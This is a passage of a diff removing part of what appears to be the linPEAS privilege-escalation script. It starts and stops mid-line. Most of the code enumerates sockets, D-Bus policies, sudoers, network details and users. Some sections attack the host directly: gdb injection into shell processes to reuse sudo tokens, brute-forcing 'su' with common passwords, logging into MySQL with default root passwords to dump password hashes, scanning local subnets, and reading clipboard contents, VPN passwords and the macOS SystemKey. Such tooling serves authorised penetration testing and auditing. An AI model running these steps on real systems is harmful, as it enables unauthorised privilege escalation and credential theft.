[ "$IAMROOT" ] && [ -w "$t" ]; then - echo "$t" | sed -${E} "s,.*,${SED_RED},g" - fi - timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) - printf "%s\n" "$timerbinpaths" | while read tb; do - if [ -w "$tb" ]; then - echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" - fi - done - #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" - #for rp in "$relpath"; do - # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" - #done - done - echo "" - - #-- PSC) .socket files - #TODO: .socket files in MACOS are folders - if ! [ "$IAMROOT" ]; then - print_2title "Analyzing .socket files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" - fi - socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketsbinpaths" | while read sb; do - if [ -w "$sb" ]; then - echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" - fi - done - socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketslistpaths" | while read sl; do - if [ -w "$sl" ]; then - echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; - fi - done - done - if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then - echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" - fi - if ! 
[ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then - echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" - fi - echo "" - - print_2title "Unix Sockets Listening" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - # Search sockets using netstat and ss - unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") - fi - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) - fi - - # But also search socket files - unix_scks_list2=$(find / -type s 2>/dev/null) - - # Detele repeated dockets and check permissions - (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do - perms="" - if [ -r "$l" ]; then - perms="Read " - fi - if [ -w "$l" ];then - perms="${perms}Write" - fi - if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; - else - echo "$l" | sed -${E} "s,$l,${SED_RED},g" - echo " └─(${RED}${perms}${NC})" - # Try to contact the socket - socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) - if [ $? -eq 0 ]; then - owner=$(ls -l "$s" | cut -d ' ' -f 3) - echo "Socket $s owned by $owner uses HTTP. 
Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "$socketcurl" | head -n 30 - fi - fi - done - echo "" - fi - - #-- PSC) Writable and weak policies in D-Bus config files - print_2title "D-Bus config files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - if [ "$PSTORAGE_DBUS" ]; then - printf "%s\n" "$PSTORAGE_DBUS" | while read d; do - for f in $d/*; do - if ! [ "$IAMROOT" ] && [ -w "$f" ]; then - echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" - fi - - genpol=$(grep "" "$f" 2>/dev/null) - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi - - userpol=$(grep "/dev/null | grep -v "root") - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #for g in `groups`; do - # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi - #done - grppol=$(grep "/dev/null | grep -v "root") - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - - #TODO: 
identify allows in context="default" - done - done - fi - echo "" - - print_2title "D-Bus Service Objects list" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - dbuslist=$(busctl list 2>/dev/null) - if [ "$dbuslist" ]; then - busctl list | while read line; do - echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; - if ! echo "$line" | grep -qE "$dbuslistG"; then - srvc_object=$(echo $line | cut -d " " -f1) - srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') - if [ "$srvc_object_info" ]; then - echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," - fi - fi - done - else echo_not_found "busctl" - fi - echo "" - echo "" - - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q Net; then - ########################################### - #---------) Network Information (---------# - ########################################### - print_title "Network Information" - - if [ "$MACOS" ]; then - print_2title "Network Capabilities" - warn_exec system_profiler SPNetworkDataType - echo "" - fi - - #-- NI) Hostname, hosts and DNS - print_2title "Hostname, hosts and DNS" - cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null - warn_exec dnsdomainname 2>/dev/null - echo "" - - #-- NI) /etc/inetd.conf - print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" - (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" - echo "" - - #-- NI) Interfaces - print_2title "Interfaces" - cat /etc/networks 2>/dev/null - (ifconfig || ip a) 2>/dev/null - echo "" - - #-- NI) Neighbours - print_2title "Networks and neighbours" - if [ 
"$MACOS" ]; then - netstat -rn 2>/dev/null - else - (route || ip n || cat /proc/net/route) 2>/dev/null - fi - (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Firewall status" - warn_exec system_profiler SPFirewallDataType - fi - - #-- NI) Iptables - print_2title "Iptables rules" - (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" - echo "" - - #-- NI) Ports - print_2title "Active Ports" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" - ( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," - echo "" - - #-- NI) MacOS hardware ports - if [ "$MACPEAS" ]; then - print_2title "Hardware Ports" - networksetup -listallhardwareports - echo "" - - print_2title "VLANs" - networksetup -listVLANs - echo "" - - print_2title "Wifi Info" - networksetup -getinfo Wi-Fi - echo "" - - print_2title "Check Enabled Proxies" - scutil --proxy - echo "" - - print_2title "Wifi Proxy URL" - networksetup -getautoproxyurl Wi-Fi - echo "" - - print_2title "Wifi Web Proxy" - networksetup -getwebproxy Wi-Fi - echo "" - - print_2title "Wifi FTP Proxy" - networksetup -getftpproxy Wi-Fi - echo "" - fi - - #-- NI) tcpdump - print_2title "Can I sniff with tcpdump?" - timeout 1 tcpdump >/dev/null 2>&1 - if [ $? -eq 124 ]; then #If 124, then timed out == It worked - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" - echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" - - #-- NI) Internet access - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then - print_2title "Internet Access?" 
- check_tcp_80 2>/dev/null & - check_tcp_443 2>/dev/null & - check_icmp 2>/dev/null & - check_dns 2>/dev/null & - wait - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then - if ! [ "$FOUND_NC" ]; then - printf $RED"[-] $SCAN_BAN_BAD\n$NC" - echo "The network is not going to be scanned..." - - else - print_2title "Scanning local networks (using /24)" - - if ! [ "$PING" ] && ![ "$FPING" ]; then - printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" - fi - - select_nc - local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") - printf "%s\n" "$local_ips" | while read local_ip; do - if ! [ -z "$local_ip" ]; then - print_3title "Discovering hosts in $local_ip/24" - - if [ "$PING" ] || [ "$FPING" ]; then - discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp - fi - - discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp - - sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips - rm $Wfolder/.ips.tmp 2>/dev/null - - while read disc_ip; do - me="" - if [ "$disc_ip" = "$local_ip" ]; then - me=" (local)" - fi - - echo "Scanning top ports of ${disc_ip}${me}" - (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null - echo "" - done < $Wfolder/.ips - - rm $Wfolder/.ips 2>/dev/null - echo "" - fi - done - fi - fi - - if [ "$MACOS" ]; then - print_2title "Any MacOS Sharing Service Enabled?" 
- rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); - scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); - flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); - rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); - rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); - bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); - printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; - echo "" - print_2title "VPN Creds" - system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," - echo "" - - print_2title "Bluetooth Info" - warn_exec system_profiler SPBluetoothDataType - echo "" - - print_2title "Ethernet Info" - warn_exec system_profiler SPEthernetDataType - echo "" - - print_2title "USB Info" - warn_exec system_profiler SPUSBDataType - echo "" - - #Irrelevant to PE - #print_2title "Airport Info" - #warn_exec system_profiler SPAirPortDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q UsrI; then - ########################################### - #----------) Users Information (----------# - ########################################### - print_title "Users Information" - - #-- UI) My user - print_2title "My user" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" - (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed 
-${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "" - - if [ "$MACPEAS" ];then - print_2title "Current user Login and Logout hooks" - defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - echo "" - - print_2title "All Login and Logout hooks" - defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist - echo "" - - print_2title "Keychains" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" - security list-keychains - echo "" - - print_2title "SystemKey" - ls -l /var/db/SystemKey - if [ -r "/var/db/SystemKey" ]; then - echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - echo "" - fi - - #-- UI) PGP keys? - print_2title "Do I have PGP keys?" - command -v gpg 2>/dev/null || echo_not_found "gpg" - gpg --list-keys 2>/dev/null - command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" - netpgpkeys --list-keys 2>/dev/null - command -v netpgp 2>/dev/null || echo_not_found "netpgp" - echo "" - - #-- UI) Clipboard and highlighted text - print_2title "Clipboard or highlighted text?" 
- if [ "$(command -v xclip 2>/dev/null)" ]; then - echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v xsel 2>/dev/null)" ]; then - echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v pbpaste 2>/dev/null)" ]; then - echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - else echo_not_found "xsel and xclip" - fi - echo "" - - #-- UI) Sudo -l - print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" - if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" - fi - ( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" - if ! 
[ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then - echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," - fi - for filename in '/etc/sudoers.d/*'; do - if [ -r "$filename" ]; then - echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" - grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," - fi - done - echo "" - - #-- UI) Sudo tokens - print_2title "Checking sudo tokens" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; - fi - is_gdb="$(command -v gdb 2>/dev/null)" - if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; - else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; - fi - if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then - echo "Checking for sudo tokens in other shells owned by current user" - for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do - echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 - if [ -f "/tmp/shrndom32r2r" ]; then - echo "Sudo token reuse exploit worked with pid:$pid! 
(see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},";
- break
- fi
- done
- if [ -f "/tmp/shrndom32r2r" ]; then
- rm -f /tmp/shrndom32r2r 2>/dev/null
- else echo "The escalation didn't work... (try again later?)"
- fi
- fi
- echo ""
-
- #-- UI) Doas
- print_2title "Checking doas.conf"
- doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null)
- if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then
- cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW},"
- else echo_not_found "doas.conf"
- fi
- echo ""
-
- #-- UI) Pkexec policy
- print_2title "Checking Pkexec policy"
- print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2"
- (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d"
- echo ""
-
- #-- UI) Superusers
- print_2title "Superusers"
- awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED},"
- echo ""
-
- #-- UI) Users with console
- print_2title "Users with console"
- if [ "$MACPEAS" ]; then
- dscl . list /Users | while read uname; do
- ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
- if grep -q "$ushell" /etc/shells; then #Shell user
- dscl .
-read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
- echo ""
- fi
- done
- else
- no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq)
- unexpected_shells=""
- printf "%s\n" "$no_shells" | while read f; do
- if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then
- unexpected_shells="$f\n$unexpected_shells"
- fi
- done
- grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
- if [ "$unexpected_shells" ]; then
- printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g"
- echo "Unexpected users with shells:"
- printf "%s\n" "$unexpected_shells" | while read f; do
- if [ "$f" ]; then
- grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g"
- fi
- done
- fi
- fi
- echo ""
-
- #-- UI) All users & groups
- print_2title "All users & groups"
- if [ "$MACPEAS" ]; then
- dscl .
list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
- else
- cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
- fi
- echo ""
-
- #-- UI) Login now
- print_2title "Login now"
- (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
- echo ""
-
- #-- UI) Last logons
- print_2title "Last logons"
- (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
- echo ""
-
- #-- UI) Login info
- print_2title "Last time logon each user"
- lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
-
- EXISTS_FINGER="$(command -v finger 2>/dev/null)"
- if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then
- dscl . list /Users | while read uname; do
- ushell=$(dscl .
-read "/Users/$uname" UserShell | cut -d " " -f2)
- if grep -q "$ushell" /etc/shells; then #Shell user
- finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
- echo ""
- fi
- done
- fi
- echo ""
-
- #-- UI) Password policy
- print_2title "Password policy"
- grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs"
- echo ""
-
- if [ "$MACPEAS" ]; then
- print_2title "Relevant last user info and user configs"
- defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null
- echo ""
-
- print_2title "Guest user status"
- sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
- sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
- sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
- echo ""
- fi
-
- #-- UI) Brute su
- EXISTS_SUDO="$(command -v sudo 2>/dev/null)"
- if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then
- print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
- POSSIBE_SU_BRUTE=$(check_if_su_brute);
- if [ "$POSSIBE_SU_BRUTE" ]; then
- SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
- printf "%s\n" "$SHELLUSERS" | while read u; do
- echo " Bruteforcing user $u..."
- su_brute_user_num "$u" $PASSTRY
- done
- else
- printf $GREEN"It's not possible to brute-force su.\n\n"$NC
- fi
- else
- print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC
- fi
- print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
- echo ""
- echo ""
- if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
-fi
-
-
-if echo $CHECKS | grep -q SofI; then
- ###########################################
- #--------) Software Information (---------#
- ###########################################
- print_title "Software Information"
-
- #-- SI) Mysql version
- print_2title "MySQL version"
- mysql --version 2>/dev/null || echo_not_found "mysql"
- echo ""
-
- #-- SI) Mysql connection root/root
- print_list "MySQL connection using default root/root ........... "
- mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null)
- if [ "$mysqlconnect" ]; then
- echo "Yes" | sed -${E} "s,.*,${SED_RED},"
- mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
- else echo_no
- fi
-
- #-- SI) Mysql connection root/toor
- print_list "MySQL connection using root/toor ................... "
- mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null)
- if [ "$mysqlconnect" ]; then
- echo "Yes" | sed -${E} "s,.*,${SED_RED},"
- mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
- else echo_no
- fi
-
- #-- SI) Mysql connection root/NOPASS
- mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null)
- print_list "MySQL connection using root/NOPASS .................
"
- if [ "$mysqlconnectnopass" ]; then
